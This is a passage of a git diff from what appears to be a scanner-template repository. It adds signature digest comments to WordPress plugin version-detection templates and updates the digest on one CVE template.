http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 065ab6d776..32da3174a5 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -33,4 +33,4 @@ http: part: body words: - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a" -# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022005dbafb1a1e5880eb00b25c22a9b2dc8f59dae74615f07df7db16a600edf28b6022100801966bde7e3a212b5244584fa69c77c8d2721b6d9898c1e4f39c9a6ef6afab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..7294fee20d 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d8264cb41d084d924ab27da18b8e1878a8c6082f3705b67f5005e820819d7d8022071824bab6ef8967f332c0b4c240b22283cee7159f3242f7c495d74229a7c96de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..12b6ceed74 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b09c83a35202530f5674cf0162c051e550c5d930026c1a016d8afb7c6e82fe1d022100a56888f8874e10ee1f2a758024071cd110222b404b81e4bf9091a4546142d58e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..233fc0e12e 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098ec6acf124d4957b5be25306863cd5aca0d7007b22337563cc7d7268be361ba02205fe370ac400834b5f5b145bcea71cf14b3b4c1e8d547698f3c8f0ce910ee4af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..68ce005bca 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3d0a1291dbff7d489f6500ef043f3ed95c7d687a83e6e9a6f9545a1b9c95c16022100c2ab30bef395226c628b524689200a8a87846d7a3a1891bda1721d432c69ae5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..fb14571ef2 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2c41b2ac826e293bd72b8951ef08c18689ea4ac3586059f52efd92be0bfff9702210086d5bfc5d876cd809670df2eb92fa57137b6a89e5c32d29c066c203c629f0c37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..77b9ddd426 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004ebd1407272c47abe5f95ed5b16e20acdbb6f97b6b18a6ca6436dd7d348c8cd022100c4280b49d4b802ba8e3c50612dd2e79e28a21676e5418127e84ad684ecf39974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..e691241197 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab0041fbfb467d29762c38742333770f27bae401f080c5b04f2b8600e01d8e94022100e9015fa86b050c34e2830afc8c965510e916f1f2b03230e803824ecda43db5a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..3425470a04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201cd2f72d306152c64d2e3a5fa5be30a28d1b9ded88df8a1c5af5e614f8aa2975022039eaf736b6d00bfd3a23259cc5cbe2808f5ada5204084ad9bddc054816c7c467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..950ac02336 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e63b172160f629921b1437f5acd216e19485766bef7e1553b17343f4ff8d5f2e022039befdad83cd4abbad9156493f8978bfd2cc1b0460ab99f5bacbc88c4288241f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..91402f27b0 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039219583fefb847c887bb3a057568cc19a0952d0bfddabf572cc4b962fd5bc7202207cc983bbe309d767c00452dbdef84a20558cf9dba707d9d640302b82d2b1ef9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..9a08801507 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf90139b0a76721843f09e9963f871702af9876f299ee6e830769d9c41a2bd6c0221009b6cb0ac719e92e4fed2911a296c1820d2bac746536b69a4a20219fa85ca4a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..ef469f4de8 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d37ed54e05539b172f856d88ab0ad0bbe831bf6cb697a63e32d409d7def47a0f02206c64d32c181ae660d81fd3426941e97eaacd915449a12d9584d4d929badb510c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..905db4987b 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e889b24189d5e3275050236fe62b6694666885f3d1cdcb408926e40903d3005022100ceb8749b3e1c21cff3869c355762782e9ecc33fcbe7b549aeb42f81a1ed66f28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..6d7382bd40 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206c3c0c362d74f33892f89809eaa4879a0d95f781fd1f48531c6421d0a39bf798022100b2235110955c0d39b7328f4f923d56c8d23ce47cb56c8011a7879cdbd4f88432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..7ceb6cca2b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc850d18a05f8c5a4738bc04027282e0ac4749fffc75623ec9a572b753bbb2a9022045a1c5e09f708ce17f06bdfba41bc603af1f0053911b8a42a77923e422e88dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..d9a18e167b 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220477b4c24de2ce0f1e41ba5965ca00f8838c66530916597a3f4f3e5e7cff75ac7022100e2a499fb320e31de783ed7573fe64752703689bfe4a3974e6520bce7ae2603c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..10e7ce3d26 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029bae92aa94ceff664bf2bf6e7953f9b7e6d8a4de210553cf198734ad684083302202c583951ee5320cb9d07eb8ffd6de93576ed07a6cb59395da2f793a51d351664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..c165c221cb 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203cd797a5ed9584ef77e5b9f5d1af5ca5f645627774722f8754f930e19cc27de902204614a0369e3e4000e23441735f06132ba33bb537b92cc48f0d6a63e684d40f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..2f8436385f 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c11daa0129e75d7b3711cd953417c794e43fc78d574c5bfc21b9a9a08ea6ea9022100e19b775c30d7fea51e350ede1c3d0dbd2da07cc6121e196bbc145c50b35e04e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..6c9cdfc188 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203be264a31f7e42071938c9b2a6f6debd653c3712ec0a5f6cfa1c45e3f66e4f9802205c5ccb6e474b3b435bf9e8cc0484e4f97e5ce7373271c1cac9dfbdb1bf39a1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..1d699ff91c 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220796455d2a858413988493ce428db88ca25ec8b754bf1e2180a5a40806917ae1e022100a986d292178ce7da30b51a6baf48d068719cd1714ef7894d65e980378280dc67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..ccc7080b92 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab9efc94f98a339c2fe4c187331647c198dfeeba10d30fcf926b5c0c6e0116f4022100ad6a128ff19dd24bf468836c52e41e37fb3537a8dc2674416c61dcf9ebf63fa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..f3d0269946 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c380ed8834ee7edbf11fde34d38b250649c172caf04ac01e59cb45ee8dff06d0220273fef24e3001f2139e962eeb405d03aa77865fef6b43868c4e4a809f6ae6015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..2430e9479d 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d42498d4e29f9c7ca6a13848a2aa8f10491f910e4f33ee6cd3ed56540834e6702210099dd29bd24cb25b62ab934364776f3ca62c2035ed6865158a0f6b071bd1f4350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..50c96a0ac2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e02cb8346805bf4d1b71e9ba15a9c372cce2e05548cb0fcbccada0c5088d2d502200c5e067ae998c53e47e85b63e029b716f294d142f3a0bf4808b5235c659cdea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..9113c46d7d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2c7241470059a57a965ee45ffcb2bd082b25f7ccc0231814e33bbe50b6f1b9a022100d5f34ae8e8d00f72d4059106cf9db8733e698ccdba2027758c5db2cefbd2e182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..783daef6c1 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7bc9b7f9e0586571d20d07c7e3d3aebcf869f91c0a871f95ad7511f2f5723a702202c6bbe1b18b358918d1fd6e853ed91d0e06bcba926f72bef3a56e0215624a7a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..1de52b49bf 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009001d3a2e4daa1c9e80808af47ae4183b7f2a27311af1d02f644ab5b79d990c3022100e096c40d9bae7df4128f361a59d331eca016ab2ae779236882991d0ee0cd4847:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..8a63660322 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d155f44d90fc5acce2e74209230a82e3f6f6e328f366f62a067427f71fb1a9c022100dac9185706eed328508168d912cc4516e41e39d540da3d3179fe61768df01f21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..9eded31576 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220608d1e2a5dcd1ec26260e3067ac7ebfa2a13865da58c070aad4052372095045a02203df53202ce6de532052d6de784829b31965674bc832ab1f6aaeb0f5ddcca5e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..1785108bd6 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022018df79e368a899dd94862eb8999aab2ae108121b9cfa27a16e82c16d771ea7c802204419c288af85ba393a77afde77aeadb97d901d0be8ea45f78eb7b6001a32b222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..c5253d0d45 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ab5eb2eee2f22dca74240312465d4feed601e2c5d7e37e893819bcdf2f2540d02204b22d751cdeeb663fba8bebaefa9d995ca96bb75078bdb3f6458b70399da8384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..03a554d72e 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008fc7a205d43c048bae2a90c6c77b150c9828912d07f7d12c9123ea169c466b34022100f52f1b9b426ca0dbdf54f62e9fc7dc93cbdde01fce31e2296f3089cc387ba0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..6d95bfa996 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ff8a106a5671b4617e4ef9af5cfb336a9183aa6bec8d0b0d0a02a9df6d4cabb0220469b6742a1144bf740fde0b4b85fdb6a8eb151d70d23e9fecbe6a4c08c28928b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..3378038b6f 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039744b090361dc6bd0c23f60d8a125f249f2b25cefb3d79843c4a95b218fcd1e022014d4f20686fbae2f741913dd7cc8091f2a9668a3cd7d932e1d293d5b414efacd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..6051f0a6be 100644 --- 